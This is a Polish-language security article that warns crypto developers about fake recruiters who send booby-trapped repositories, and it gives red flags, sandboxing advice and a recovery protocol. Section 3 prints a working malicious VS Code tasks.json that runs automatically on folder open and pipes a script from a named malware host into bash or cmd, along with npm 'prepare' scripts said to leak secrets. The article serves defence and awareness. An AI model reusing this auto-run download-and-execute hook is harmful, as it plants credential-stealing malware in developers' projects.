Zaraźliwa Rozmowa: Jak fałszywi rekruterzy hakują programistów
Streszczenie: Nowa fala ataków sponsorowanych przez państwa uderza w najlepszych programistów krypto. Oszuści podszywają się pod rekruterów lub CTO i zmuszają kandydatów do otwarcia złośliwego kodu. Ten artykuł analizuje przypadek "Martina Erazo", exploit VS Code "tasks.json" i niezbędny "Protokół Wypalania" (Burn Protocol), by przetrwać.
Zastrzeżenie: Ten artykuł raportuje incydenty cyberbezpieczeństwa, w których podszywano się pod prawdziwe osoby. Imiona "Martin Erazo" i "Ara Vartanian" odnoszą się do person używanych przez atakujących. Wierzymy, że prawdziwe osoby o tych nazwiskach są niewinnymi ofiarami kradzieży tożsamości.
1. Idealna Ofiara: Persona "Martin Erazo"
Zaczyna się od wiadomości, która idealnie trafia w Senior Deva:
- Rola: CTO / Główny Architekt
- Budżet: $6M finansowania
- Technologie: Web3, AI, Zdecentralizowana Infrastruktura
W ostatnio potwierdzonym ataku, rekruter o nazwisku "Martin Erazo" skontaktował się przez LinkedIn. Profil używał nazwiska i zdjęcia prawdziwego reżysera teatralnego, ale historia zatrudnienia była fałszywa i nagle zmieniła się w 2025 roku na "Zarządzanie Projektami IT" - klasyczny znak zhakowanego lub kupionego konta.
Oszustwo postępuje szybko. Pomijają standardowy screening HR i przechodzą od razu do "Wywiadu Technicznego" z kadrą zarządzającą - w tym przypadku imitacją prawdziwego CTO z branży, Ary Vartaniana (obecnie w Limit Break).
Czerwona Flaga: Nazwy projektów ciągle się zmieniają. Rekruter sprzedaje "Betfin" (platformę GameFi), ale przesłana prezentacja dotyczy "SpaceXView" (projektu Metaverse). Ta niespójność to wskazówka, że oszuści recyklingują zasoby między kampaniami.
2. Pułapka: "Czy możesz przejrzeć nasz kod MVP?"
Fałszywy "CTO" twierdzi, że potrzebuje twojego eksperckiego oka do przeglądu ich kodu MVP (Minimum Viable Product). Wysyłają link do repozytorium GitHub lub plik ZIP i naciskają, byś otworzył go podczas rozmowy lub zaraz po niej.
To tutaj następuje hack.
Wykorzystują twoją chęć pomocy i ego. Myślisz, że szukasz błędu w komponencie React. W rzeczywistości "błąd" to "funkcja" zaprojektowana, by ukraść twoje oszczędności.
3. Techniczna Infiltracja: Zero-Click Malware
Atakujący używają exploitów "zero-click" lub "low-click", które celują w narzędzia deweloperskie. Nie muszą, żebyś uruchamiał aplikację; wystarczy, że otworzysz folder.
Broń: .vscode/tasks.json
W tym konkretnym przypadku, Repo zawierało zaminowany plik .vscode/tasks.json. Ten plik mówi VS Code, jak zbudować projekt.
Złośliwy Kod:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": To jest wyzwalacz. W momencie otwarcia folderu w VS Code, to zadanie uruchamia się automatycznie.
- Payload: Używa curl do pobrania skryptu z
vscodesettingtask.vercel.app- znanego hosta malware, przebranego za API ustawień. - Wynik: Skrypt działa w pamięci i natychmiast kradnie hasła Chrome, pliki cookie sesji i klucze SSH.
Plan B: skrypty package.json
Jeśli hack VS Code się nie powiedzie, mają skrypty npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Uruchomienie npm install lub npm start wyzwala server/server.js - lokalny skrypt C2 (Command and Control), który wycieka twoje Zmienne Środowiskowe (klucze AWS, seed portfela) do atakującego.
4. Czerwone Flagi vs Zielone Flagi
Jak to zauważyć, zanim będzie za późno?
Jeśli jesteś Devem, "Prywatne Repo" lub pliki ZIP powinny uruchomić alarm najwyższego poziomu. Legalne firmy używają Publicznych Repo lub standardowych platform testowych.
Ostrzeżenie: To nie jedyny sposób ataku na Devów. Przeczytaj o Pułapce Współpracownika na Discordzie i jak Ataki na Łańcuch Dostaw czynią zależności niebezpiecznymi.
| 🚩 Czerwona Flaga (Uciekaj) | ✅ Zielona Flaga (Bezpiecznie) |
|---|---|
| Kod Najpierw: Wysyłają kod przed ofertą pracy | Standardowy Proces: Najpierw rozmowa, potem kod |
| Zepsuta Tożsamość: Rekruter ma nieistotną przeszłość (np. Artysta -> IT Manager) | Zweryfikowana Historia: Ścieżka kariery na LinkedIn jest spójna |
| Niezgodność: Nazwy projektów nie pasują (Betfin vs SpaceXView) | Spójność: Nazwa, dokumentacja i strona www pasują |
| Pilność: "CTO czeka", "otwórz teraz" | Cierpliwość: Szanują twój czas i harmonogram |
| Prywatny E-mail: [email protected] | Firmowy E-mail: [email protected] (z działającymi rekordami MX) |
5. Protokół Bezpieczeństwa: Jak bezpiecznie rekrutować
Jeśli jesteś Senior Devem, będziesz celem polowania. Utwardzenie środowiska jest obowiązkowe.
Protokół 1: Środowisko "Jednorazowe" (Burner)
NIGDY nie używaj głównej stacji roboczej do testów kodu.
- Maszyny Wirtualne: Używaj VirtualBox lub VMWare.
- Środowiska Cloud Dev: Używaj GitHub Codespaces lub Gitpod. Są krótkotrwałe i odizolowane od lokalnych plików portfela.
Protokół 2: Audyt Kryminalistyczny
Zanim otworzysz nieznany kod:
- Sprawdź .vscode/tasks.json: Szukaj
runOn: folderOpen. - Sprawdź package.json: Szukaj podejrzanych skryptów preinstall lub postinstall.
- Szukaj Słów kluczowych: grep dla
curl,wget,os.homedir(),.ssh,wallet.
Protokół 3: Utwardzanie VS Code
Globalnie wyłącz "Zaufanie do Obszaru Roboczego" (Workspace Trust).
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- To zmusza VS Code do pytania o zgodę przed uruchomieniem zadań na poziomie folderu.
6. Rozwiązanie: "Protokół Wypalania" (Burn Protocol)
Jeśli otworzyłeś złośliwe Repo (jak to wysłane przez personę "Martin Erazo"), załóż, że zostałeś zhakowany. Rollback nie wystarczy.
- Odłącz: Natychmiast wyciągnij kabel Ethernet.
- Spal Portfel: Twoje Klucze Prywatne wyciekły. Utwórz nowe portfele na czystym urządzeniu (telefon) i przenieś pozostałe środki. Nigdy nie używaj starego seeda.
- Zabij Sesje: Wyloguj wszystkie sesje w Google, GitHub, AWS. Unieważnij aktywne tokeny.
- Audyt Kluczy SSH: Sprawdź ustawienia GitHub/GitLab. Atakujący często dodają własne klucze SSH, by zachować dostęp przez tylne drzwi. Usuń te, których nie rozpoznajesz.
- Nuke It: Wyzeruj dysk i zainstaluj system od nowa. To jedyny sposób, by mieć 100% pewności, że Rootkity zniknęły.
Wnioski
Oszustwo "Zaraźliwa Rozmowa" używa twojej własnej ekspertyzy przeciwko tobie. Celuje w twoją chęć rozwiązywania problemów. Ale w Web3 paranoja to cnota zawodowa. Weryfikuj każdą tożsamość, piaskuj (sandbox) każde repozytorium i nigdy nie ufaj "rekruterowi", któremu spieszy się, byś uruchomił kod.
Powiązane Artykuły
Zatrucie Łańcucha Dostaw (Supply Chain Poison): Kiedy zaufane aktualizacje stają się malwarem
Nie pobrałeś nic dziwnego. Tylko zaktualizowałeś aplikację Ledger... I to był moment, w którym zniknęły pieniądze. Horror ataku na łańcuch dostaw.
Papierowa Tarcza (The Paper Shield): Jak poprawnie zabezpieczyć Seed Phrase
Zrzuty ekranu to katastrofa. Chmura to komputer kogoś innego. Jedyny bezpieczny sposób na przechowywanie kluczy prywatnych to 'Stal' i 'Papier'.
Długa Gra (The Long Con): Psychologia 'Rzezi Świń'
Nie napisała pod zły numer. I nie jest w tobie zakochana. Poznaj 'Sha Zhu Pan', najbardziej brutalne oszustwo w krypto, i dowiedz się, jak rozpoznać scenariusz.